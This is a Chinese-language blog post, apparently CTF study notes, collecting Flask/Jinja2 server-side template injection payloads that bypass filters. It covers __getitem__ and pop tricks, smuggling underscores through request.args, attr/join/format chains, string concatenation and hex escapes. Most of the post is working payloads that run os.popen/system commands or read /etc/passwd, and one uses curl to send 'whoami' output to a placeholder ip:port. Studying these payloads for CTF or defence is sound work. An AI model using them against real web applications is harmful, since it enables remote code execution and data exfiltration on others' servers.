Flask Jinja2 SSTI Bypass

已于 2022-02-19 23:35:30 修改
阅读量862 收藏 2
点赞数 1
文章标签: flask python 后端
于 2022-02-19 22:50:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51661807/article/details/122880651
版权

注意:“_ getattribute_”只适用于所有的“.”运算符;
_ getitem_”只适用于所有的“[]”运算符;

过滤[

凡是在类中定义__getitem__方法,那么它的实例对象(假定为p),可以像这样p[key]取值,当实例对象做p[key]运算时,会调用类中的方法__getitem__。

''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('dir').read()

关键字过滤(利用request)

利用request.args属性(cookie等)

* __class__

{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read()}}&path=/etc/passwd

* __class__/_

{{ request|attr((request.args.usc*2,request.args.cls,request.args.usc*2)|join)}}&cls=class&usc=_

* __class__/_

{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_

* __class__/_

{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_

** 过滤{{

{%   ''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('curl http://ip:port?i=`whoami`').read()=='p' %}1{% endif %}

** 过滤ls,cat,os等关键字

值得注意的是,python里'l''s'也可以拼接,不需要+符号

[].__class__.__base__.__subclasses__()[72].__init__.__globals__['os'].system('d'+'i'+'r')

[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__['o'+'s'].system('l''s')

[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].system('l'+'s')

但这些payload里的globals也不能绕过,我们可以使用getattribute()+字符串拼接来绕过

[].__class__.__base__.__subclasses__()[72].__init__.__getattribute__('__global'+'s__')['os'].system('d'+'i'+'r')

[].__class__.__base__.__subclasses__()[72].__init__.__getattribute__('5f5f676c6f62616c735f5f'.decode('hex'))['os'].system('d'+'i'+'r')

实际上写\x5f\x5f也同样可以解析。

一个较为成熟的payload:

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

 当过滤很多的时候可以一点一点拼凑

这里还是放y1ng大佬的图(高糊)

参考:  python总结(五):__get__、__getattr__、__getitem__、__getattribute__之间的差异与联系_甘焕的博客-CSDN博客

桃雾雨Rain
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSTI Bypass 学习 (Python3&jinja2
qq_40648358的博客
05-25 1529
SSTI Bypass 学习 (Python3&jinja2 前言 在说Bypass之前咱们先说一下SSTI的基本功 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 利用流程 获取基本类-&g
关于flaskSSTI注入
Kr的博客
01-21 7132
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
SSTI学习(Flask)
yaoge1225的博客
07-19 171
SSTI学习(Flask) 本地环境docker vulhub from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render() if __na
【Real】[Flask]SSTI
最新发布
欢迎来到我的学习笔记薄
05-28 1212
温馨提示:看到哪里不懂直接跳到知识点部分,理解完再回到解题过程。
FlaskJinja2) 服务端模板注入漏洞(SSTI)
weixin_30885111的博客
01-12 318
flask Flask 是一个 web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。 Flask 属于微框架(micro-framework)这一类别,微架构通常是很小的不依赖于外部库的框架。这既有优点也有缺点,优点是框架很轻量,更新时依赖少,并且专注安全方...
Flask入门SSTI
qq_43936524的博客
05-14 943
flask基本知识 SSTI 靶场通关记录 绕过方式总结
flaskssti:测试SSTI
02-21
烧瓶
Jinja2-2.10
12-21
**Jinja2** 是一个强大的、现代的以及设计者友好的模板引擎,由Pallets团队的Armin Ronacher开发,他也是著名的Python Web框架**Flask** 的创始人。Jinja2是基于Python语言,完全符合PEP 292和PEP 308的规范,提供了...
sanic-jinja2:Jinja2对Sanic的支持
05-10
sanic-jinja2 Jinja2对Sanic的支持安装python3 -m pip install sanic-jinja2 特征sanic-jinja2支持: 烧瓶状flash法i18n和Babel支持@jinja.template语法支持用于创建应用程序的工厂模式init_app方法用法注意: 如果...
jinja2pp:Jinja2 ++
04-04
Jinja2 ++是用于使用变量优先级进行模板化的单文件解决方案中的一滴。 您可以使用任何语言!怎么运行的基于Unix管道: JSON - stdin |> stdout - JSON var_file是从STDIN提取JSON并从STD吐出JSON的任何可执行文件。 ...
Jinja2中文文档.pdf
03-15
这个是jinja2的中文文档,都是免费的,希望可以帮大家节省找文档的时间
pythonjinja2
05-21
**PythonJinja2详解** Jinja2是一个强大的、现代的、设计者友好的模板引擎,它是用Python语言编写的,被广泛应用于Web应用开发中,以生成动态HTML、XML或其他标记语言。Jinja2的设计灵感来源于Django模板语言,但...
Python Flask应用之SSTI初探
qq_38755190的博客
01-28 547
Falsk是什么? Flask是一个轻量级的可定制框架,使用Python语言编写,较其他同类型框架更为灵活、轻便、安全且容易上手。它可以很好地结合MVC模式进行开发,开发人员分工合作,小型团队在短时间内就可以完成功能丰富的中小型网站或Web服务的实现。 Flask最重要的特点。Flask的两个主要核心应用是Werkzeug和模板引擎Jinja。 Flask的安装 我用的是windows系统,在装有python的系统上,直接打开cmd窗口,我们输入一下命令: pip install Flask
Flask框架漏洞:SSTI
glass_york的博客
12-01 1330
SSTI 是 Server-Side Template Injection即 服务端模板注入,它是一种安全漏洞攻击技术。当应用程序在服务器端使用模板引擎来呈现动态生成的内容时,如果用户可以控制模板引擎的输入,就可能导致 SSTI 漏洞。在正常情况下,模板引擎被设计用于安全地将预定义的模板与数据进行组合,生成最终的输出。但是,SSTI 漏洞允许攻击者在应用程序的上下文中执行任意的服务器端代码。当攻击者能够通过用户输入或其他外部来源插入恶意的模板代码时,就会产生一系列问题。
[GYCTF2020]FlaskApp(SSTI
qq_45521281的博客
06-09 2902
进入题目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
flask模板注入(ssti),一篇就够了
热门推荐
qq_59950255的博客
03-02 1万+
1.什么是flask? flask是用python编写的一个轻量web开发框架 2.ssti成因 flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入 本地演示(需要自行安装flask,requests模块) 通过输入参数key可以进行简单的渲染,创造新的网页 当我们把render_template 换成render_template_string后,并对参数不进行处理 看看结果 代码执.
SSTI模板注入(flask) 学习总结
Jay17的博客
10-18 1094
SSTI模板注入(flask) 学习总结
[python]浅谈FlaskSSTI漏洞
记录学习,一起进步
04-03 1226
[python]浅谈FlaskSSTI漏洞
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3569
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
Jinja2中文教程:现代Python模板语言
"Jinja2中文文档.pdf" Jinja2是一个强大的Python模板引擎,它的设计灵感来源于Django模板,但提供了更多现代化和高效的功能。该文档详细介绍了Jinja2的各种特性和用法,旨在帮助用户快速理解和应用这个模板语言。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值